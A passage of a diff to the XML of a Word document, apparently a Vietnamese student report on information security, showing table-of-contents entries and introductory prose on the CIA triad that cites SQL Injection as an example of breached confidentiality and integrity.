+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343477" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4.1.1.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tiểu mục cấp 4</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343477 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343478" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Các công cụ và môi trường thực hành</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343478 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343479" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4.3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Mô phỏng các bước thực hiện demo</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343479 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2482,12 +5082,16 @@
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
           <w:noProof/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351940" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343480" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2500,7 +5104,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2508,7 +5111,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2516,22 +5118,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351940 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343480 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2539,15 +5138,13 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>4</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -3163,6 +5760,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc208343436"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3174,6 +5772,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>GIỚI THIỆU TỔNG QUAN</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3204,6 +5803,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:bookmarkStart w:id="1" w:name="_Toc208343437"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3214,6 +5814,7 @@
         </w:rPr>
         <w:t>Các khái niệm cơ bản về an toàn thông tin</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3292,7 +5893,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc207867296"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc207867296"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3375,7 +5976,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> nằm ở phía dưới của hình</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3415,6 +6016,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc208343438"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3439,12 +6041,13 @@
         </w:rPr>
         <w:t>(Confidentiality, Integrity, Availability)</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="1224"/>
+        <w:ind w:firstLine="504"/>
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -3453,34 +6056,514 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nội dung của tiểu mục cấp 3</w:t>
+      <w:bookmarkStart w:id="4" w:name="_Toc207867335"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Mô hình tam giác CIA là mô hình cốt lõi và nền tảng của an toàn thông tin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"GzFWnHDD","properties":{"formattedCitation":"[1]","plainCitation":"[1]","noteIndex":0},"citationItems":[{"id":31,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/PGQK5TRT"],"itemData":{"id":31,"type":"webpage","title":"An Toàn Thông Tin Là Gì?","URL":"https://itsystems.vn/an-toan-thong-tin-la-gi/","accessed":{"date-parts":[["2025",9,9]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>. Nó định nghĩa ba mục tiêu chính mà mọi chiến lược bảo mật cần hướng tới để bảo vệ thông tin và hệ thống</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"FhvfhyVO","properties":{"formattedCitation":"[2]","plainCitation":"[2]","noteIndex":0},"citationItems":[{"id":32,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/J6TCX34C"],"itemData":{"id":32,"type":"webpage","title":"An toàn thông tin là gì? 4 Nội dung cần biết","URL":"https://vnce.vn/an-toan-thong-tin-la-gi","accessed":{"date-parts":[["2025",9,9]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="1224"/>
+        <w:ind w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Confidentiality (Tính bảo mật):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Mục tiêu này đảm bảo rằng thông tin được bảo vệ khỏi sự truy cập, sử dụng, hoặc thay đổi không được phép</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"xGSRkGSU","properties":{"formattedCitation":"[1], [2]","plainCitation":"[1], [2]","noteIndex":0},"citationItems":[{"id":31,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/PGQK5TRT"],"itemData":{"id":31,"type":"webpage","title":"An Toàn Thông Tin Là Gì?","URL":"https://itsystems.vn/an-toan-thong-tin-la-gi/","accessed":{"date-parts":[["2025",9,9]]}}},{"id":32,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/J6TCX34C"],"itemData":{"id":32,"type":"webpage","title":"An toàn thông tin là gì? 4 Nội dung cần biết","URL":"https://vnce.vn/an-toan-thong-tin-la-gi","accessed":{"date-parts":[["2025",9,9]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[1], [2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>. Một cuộc tấn công SQL Injection thành công, nơi tin tặc có thể lấy được dữ liệu người dùng như email và mật khẩu, là một ví dụ điển hình về việc vi phạm tính bảo mậ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">t này </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"4hIV9CaR","properties":{"unsorted":true,"formattedCitation":"[3], [4]","plainCitation":"[3], [4]","noteIndex":0},"citationItems":[{"id":33,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/UGZNH7RH"],"itemData":{"id":33,"type":"webpage","title":"Các Lỗ Hổng Bảo Mật của Website bị HACKER Tấn Công Nhất","URL":"https://lanit.com.vn/cac-lo-hong-bao-mat-cua-website-bi-hacker-loi-dung-tan-cong-nhieu-nhat.html","accessed":{"date-parts":[["2025",9,9]]}}},{"id":34,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/2B8LPZ96"],"itemData":{"id":34,"type":"webpage","title":"XSS là gì? Kỹ thuật tấn công XSS, cách ngăn chặn hiệu quả","URL":"https://vietnix.vn/xss-la-gi/","accessed":{"date-parts":[["2025",9,9]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[3], [4]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Integrity (Tính toàn vẹn): data-type):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Tính toàn vẹn của dữ liệu đề cập đến việc đảm bảo tính chính xác và đầy đủ của thông tin, ngăn chặn việc sửa đổi hoặc phá hủy trái phép. Khi một kẻ tấn công SQL Injection có thể sửa, xóa hoặc thay đổi toàn bộ dữ liệu trong cơ sở dữ liệu, tính toàn vẹn của hệ thống đã bị phá vỡ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hoàn toàn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"hrAJjQzM","properties":{"formattedCitation":"[5], [6]","plainCitation":"[5], [6]","noteIndex":0},"citationItems":[{"id":36,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/E4WFFTM2"],"itemData":{"id":36,"type":"webpage","title":"SQL Injection là gì? Cách giảm thiểu và phòng ngừa SQL Injection","URL":"https://topdev.vn/blog/sql-injection/","accessed":{"date-parts":[["2025",9,9]]}}},{"id":37,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/Z8PB4PNZ"],"itemData":{"id":37,"type":"webpage","abstract":"SQL Injection là gì? Mức độ nguy hiểm của nó ra sao? Cách phòng tránh tấn công SQL Injection như nào? Cùng FPT Shop tìm hiểu trong bài viết sau.","language":"vi","title":"SQL Injection là gì? Độ nguy hiểm và cách phòng tránh hiệu quả","title-short":"SQL Injection là gì?","URL":"https://fptshop.com.vn/tin-tuc/danh-gia/sql-injection-la-gi-159279","author":[{"family":"FPT","given":"Công ty Cổ phần Bán lẻ Kỹ","dropping-particle":"thuật số"}],"accessed":{"date-parts":[["2025",9,9]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
